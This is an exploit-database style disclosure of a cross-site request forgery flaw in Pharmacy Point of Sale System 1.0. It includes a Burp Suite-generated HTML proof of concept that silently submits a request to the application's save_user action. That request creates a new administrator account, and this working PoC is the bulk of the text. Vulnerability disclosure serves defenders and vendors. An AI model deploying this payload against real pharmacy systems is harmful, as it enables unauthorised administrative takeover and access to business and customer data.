Pharmacy Point Of Sale System 1.0 Cross Site Request Forgery

Pharmacy Point of Sale System version 1.0 suffers from a cross site request forgery vulnerability.

MD5 | fdb1ff2011d4cd0b2ebbec8a953bec41

# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
# Date: 10/11/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage:
# Software Link:
# Version: 1
# Tested on: Windows 10

The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using crafted post request.



<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
<input type="hidden" name="id" value="" />
<input type="hidden" name="fullname" value="Mrt" />
<input type="hidden" name="username" value="NewAdmin" />
<input type="hidden" name="type" value="1" />
<input type="submit" value="Submit request" />


Related Posts